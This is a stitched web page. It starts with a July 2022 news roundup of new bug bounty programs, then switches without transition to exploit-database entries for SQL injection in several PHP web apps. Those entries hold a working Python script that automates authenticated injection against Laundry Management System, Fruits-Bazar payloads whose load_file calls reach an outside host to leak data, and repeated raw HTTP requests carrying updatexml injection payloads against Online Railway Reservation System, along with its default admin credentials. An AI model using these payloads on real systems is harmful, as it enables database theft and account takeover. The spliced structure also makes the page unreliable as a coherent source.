New web targets for the discerning hacker

New web targets for the discerning hacker

Bounty hunting remains a popular business, with a report this month revealing that the vast majority of ethical hackers would like to do more.

The survey, from Belgian bug bounty platform **Intigriti**, found that 96% were keen to spend more time bounty hunting, with two thirds considering it as a full-time career. The biggest draw is the money, cited by nearly half, along with the ability to work anywhere in the world, the ability to work alone, and the chance to outsmart malicious hackers.

Currently, more than half of bug bounty hunters are also in full-time employment elsewhere, and around a third are students. More than one in five, though, get more than a quarter of their total income from bounty payouts.

And for those keen to get stuck in, there’s a new invite-only bug bounty program for the French government’s identity authentication application, **France Identité**, launched earlier this year to complement the country’s new electronic identity cards.

Hosted by Paris-based ethical hacking platform **YesWeHack**, the program has recruited 30 ethical hackers so far, with specific skills relating to the application, particularly cryptography. It will eventually be opened to all, and will run for the mobile app’s lifetime.

Finally, **Google**’s been generous lately, paying out more than $300,000 for reports on a variety of flaws in Google Cloud Platform (GCP) during last year.

Security researcher Sebastian Lutz took first prize, with an award of $133,337, for discovering a bug in in Identity-Aware Proxy (IAP) that offered a way for an attacker to access IAP-protected resources. Second place, meanwhile, went to Hungarian researcher Imre Rad, who earned $73,331 after uncovering a mechanism to take over a Google Compute Engine virtual machine.

The program, which kicked off in 2019, now represents a fair chunk of the total $8.7 million awarded by Google across its complete range of vulnerability disclosure programs.

**The latest bug bounty programs for July 2022**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**Animal Friends**

**Program provider:**  
Independent

**Program type:**  
Public

**Max reward:**  
£400 ($480)

**Outline:**  
UK pet insurance company Animal Friends has launched a public bug bounty program that’s focused on securing its corporate website, customer portal, vet portal, and sales platform.

**Notes:**  
Discussing the new program, the insurance provider said: “No system is ever perfect, and therefore Animal Friends believes that working with skilled security researchers around the world is crucial to identify and fix any weaknesses.”

Check out the Animal Friends bug bounty page for more details

**ClickHouse**

**Program provider:**  
Bugcrowd

**Program type:**  
Public

**Max reward:**  
$2,500

**Outline:**  
ClickHouse is an open source, column-oriented OLAP database management system that allows users to generate analytical reports using SQL queries in real time.

**Notes:**  
The main focus of the public program is the open source version of the ClickHouse platform.

Check out the ClickHouse bug bounty page at Bugcrowd for more details

**France Identité**

**Program provider:**  
YesWeHack

**Program type:**  
Private

**Max reward:**  
Undisclosed

**Outline:**  
The French government has launched an invite-only bug bounty program for its newly launched identity authentication application, ‘France Identité’.

**Notes:**  
Hosted by Paris-based ethical hacking platform YesWeHack, the program will eventually be opened up to all security researchers and then run for the mobile app’s lifetime.

Check out our recent coverage for more details

**MetaMask**

**Program provider:**  
HackerOne

**Program type:**  
Public

**Max reward:**  
$50,000

**Outline:**  
MetaMask, one of the most widely used wallets for interacting with distributed applications, has launched a bug bounty program offering rewards of up to $50,000 for critical vulnerabilities.

**Notes:**  
MetaMask is particularly seeking reports demonstrating how an attacker could extract the secret recovery phrase or a private key from a wallet, or make a user’s wallet behave in “unexpected ways”.

Check out the MetaMask bug bounty page at HackerOne for more details

**Opera**

**Program provider:**  
Independent

**Program type:**  
Private

**Max reward:**  
Undisclosed

**Outline:**  
The developers behind the Opera web browser have launched a private bug bounty program to accompany the existing public program that’s housed on the Bugcrowd platform.

**Notes:**  
There are currently few details relating to this private program, although anyone expressing an interest must already have a Bugcrowd ID.

Check out Opera’s private bug bounty page for more details

**Phemex**

**Program provider:**  
Bugcrowd

**Program type:**  
Public

**Max reward:**  
$2,500

**Outline:**  
Cryptocurrency trading platform Phemex has partnered with Bugcrowd to launch a bug bounty program.

**Notes:**  
Researchers have been tasked with finding bugs in the Phemex website and mobile apps. Cross-site scripting (XSS) and denial-of-service (DoS) exploits are out of scope.

Check out the Phemex bug bounty page at Bugcrowd for more details

**Other bug bounty and VDP news this month**

*   The 2022 **President’s Cup Cybersecurity Competition** is due to launch later this summer. Hosted by CISA, the annual national cyber competition aims to identify and reward the best cybersecurity talent in the federal executive workforce. Registration is now open for eligible participants.
*   **GameStop**, **Oanda**, and **PlanetArt** have launched (unpaid) VDPs on HackerOne.
*   Security pro Quinten Bowen has launched a **malware analysis capture-the-flag** (CTF) competition. Registration is free, and the CTF has “beginner to intermediate level flags” associated with static and dynamic analysis.

Curated by James Walker. Introduction by Emma Woollacott.

**PREVIOUS EDITION** Bug Bounty Radar // The latest bug bounty programs for June 2022

Bug Bounty Radar // The latest bug bounty programs for July 2022

A vulnerability classified as critical has been found in Online Hotel Booking System Pro Plugin 1.0. Affected is an unknown function of the file /front/roomtype-details.php. The manipulation of the argument tid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

    # # # # # 
    # Exploit Title: Online Hotel Booking System Pro v1.0 (WordPress Plugin) - SQL Injection
    # Google Dork: N/A
    # Date: 27.01.2017
    # Vendor Homepage: http://www.bestsoftinc.com/
    # Software Buy: https://codecanyon.net/item/online-hotel-booking-system-pro-wordpress-plugin/9338914
    # Demo: http://envato.bestsoftinc.net/wp-hotel-pro/
    # Version: 1.0
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[beygir]ihsan[nokta]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PLUGIN_PATH]/front/roomtype-details.php?tid=[SQL]
    # E.t.c
    # # # # #

CVE-2017-20124: Offensive Security’s Exploit Database Archive

A vulnerability classified as critical was found in Online Hotel Booking System Pro 1.2. Affected by this vulnerability is an unknown functionality of the file /roomtype-details.php. The manipulation of the argument tid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

CVE-2017-20125

Fruits-Bazar 2021 version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Fruits-Bazar 2021 v1.0 SQLi## Author: nu11secur1ty## Date: 06.29.2022## Vendor: https://github.com/creativesaiful## Software: https://github.com/creativesaiful/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar-## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Md-Saiful-Islam-creativesaiful/2021/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar## Description:The recover_email parameter appears to be vulnerable to SQL injection attacks.The attacker can take access to all accounts on this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: recover_email (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net'+(selectload_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg'))+''OR NOT 9177=9177 AND 'HeFM'='HeFM&u_pass_recover=Recover Password    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net'+(selectload_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg'))+''AND (SELECT 6160 FROM(SELECT COUNT(*),CONCAT(0x7178627171,(SELECT(ELT(6160=6160,1))),0x7170767871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND'Mvga'='Mvga&u_pass_recover=Recover Password    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net'+(selectload_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg'))+''AND (SELECT 4612 FROM (SELECT(SLEEP(5)))vECZ) AND'qfSm'='qfSm&u_pass_recover=Recover Password---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Md-Saiful-Islam-creativesaiful/2021/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar)## Proof and Exploit:[href](https://streamable.com/ngodwj)-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Fruits-Bazar 2021 1.0 SQL Injection

Laundry Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Laundry Management System 1.0 - Authenticated SQL Injection# Date: 29-06-2022# Exploit Author: syad# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ci_laundry.zip# Version: 1.0# Tested on: Windows 10 + XAMPP 3.2.4# CVE ID : N/A# Description # The dari parameter does not perform input validation on the laporan_filter.php file it allow authenticated SQL Injectionimport sysimport requestssess = requests.Session()proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}def login(ip,username,password):    target = "http://%s/ci_laundry/welcome/login" % ip    daftar = {'username':username,'password':password}    masuk = sess.post(target, data=daftar, proxies=proxies)    if "Dashboard" in masuk.text:        print("[$] Success Login :)")    else:        return Falsedef trigger_sqli(ip):    target = "http://%s/ci_laundry/pengeluaran/laporan_filter" % ip    sql = {"dari":"1'",'sampai':'123'}    test = sess.post(target, data=sql, proxies=proxies)    if "You have an error in your SQL syntax" in test.text:        print("[$] Trigger SQL Injection !!!! :)")    else:        return Falsedef count_column(ip):    target = "http://%s/ci_laundry/pengeluaran/laporan_filter" % ip    sql = {"dari":"1' ORDER BY 14-- -",'sampai':'123'}    test = sess.post(target, data=sql, proxies=proxies)    if test.status_code == 200:        print("[$] Found 14 Column In Database !!! :)")    def got_database_name(ip):    target = "http://%s/ci_laundry/pengeluaran/laporan_filter" % ip    sql = {"dari":"1' union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14-- -",'sampai':'123'}    test = sess.post(target, data=sql, proxies=proxies)    if "laundry_db" in test.text:        print("[$] Found Database Name is => laundry_db")def got_version_data(ip):    target = "http://%s/ci_laundry/pengeluaran/laporan_filter" % ip    sql = {"dari":"1' union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14-- -",'sampai':'123'}    test = sess.post(target, data=sql, proxies=proxies)    if "10.4.24-MariaDB" in test.text:        print("[$] Found Version Database is => 10.4.24-MariaDB")if __name__ == "__main__":    try:        ip = sys.argv[1].strip()        username = sys.argv[2].strip()        password = sys.argv[3].strip()    except IndexError:        print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])        print("[-] Example: %s 192.168.1.x admin admin123"  % sys.argv[0])        sys.exit(-1)login(ip,username,password)trigger_sqli(ip)count_column(ip)got_database_name(ip)got_version_data(ip)

Laundry Management System 1.0 SQL Injection

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_service.

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/classes/Master.php?f=delete\_service

Vulnerability location: /orrs/classes/Master.php?f=delete\_service, id=

Current database name: orrs\_db,length is 7

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

You need to execute the following sql statement in the database to create the "service\_list" table

CREATE TABLE \`service\_list\` (
  \`id\` int(30) NOT NULL,
  \`code\` varchar(100) NOT NULL,
  \`name\` text NOT NULL,
  \`delete\_flag\` tinyint(1) NOT NULL,
  \`date\_created\` datetime NOT NULL,
  \`date\_updated\` datetime NOT NULL
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

POST /orrs/classes/Master.php?f\=delete\_service HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 65
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-33061: bug_report/SQLi-9.md at main · k0xx11/bug_report

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_train.

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/classes/Master.php?f=delete\_train

Vulnerability location: /orrs/classes/Master.php?f=delete\_train, id=

Current database name: orrs\_db,length is 7

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /orrs/classes/Master.php?f\=delete\_train HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/orrs/admin/?page=trains
Content-Length: 65
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-33059: bug_report/SQLi-7.md at main · k0xx11/bug_report

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_message.

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/classes/Master.php?f=delete\_message

Vulnerability location: /orrs/classes/Master.php?f=delete\_message, id=

Current database name: orrs\_db,length is 7

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /orrs/classes/Master.php?f\=delete\_message HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/orrs/admin/?page=inquiries
Content-Length: 65
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-33058: bug_report/SQLi-6.md at main · k0xx11/bug_report

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_reservation.

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/classes/Master.php?f=delete\_reservation

Vulnerability location: /orrs/classes/Master.php?f=delete\_reservation, id=

Current database name: orrs\_db,length is 7

\[+\] Payload: id=8' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /orrs/classes/Master.php?f\=delete\_reservation HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/orrs/admin/?page=reservations
Content-Length: 65
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close
id=8' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-33057: bug_report/SQLi-5.md at main · k0xx11/bug_report

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_schedule.

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/classes/Master.php?f=delete\_schedule

Vulnerability location: /orrs/classes/Master.php?f=delete\_schedule, id=

Current database name: orrs\_db,length is 7

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /orrs/classes/Master.php?f\=delete\_schedule HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/orrs/admin/?page=schedules
Content-Length: 65
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

Tag

#sql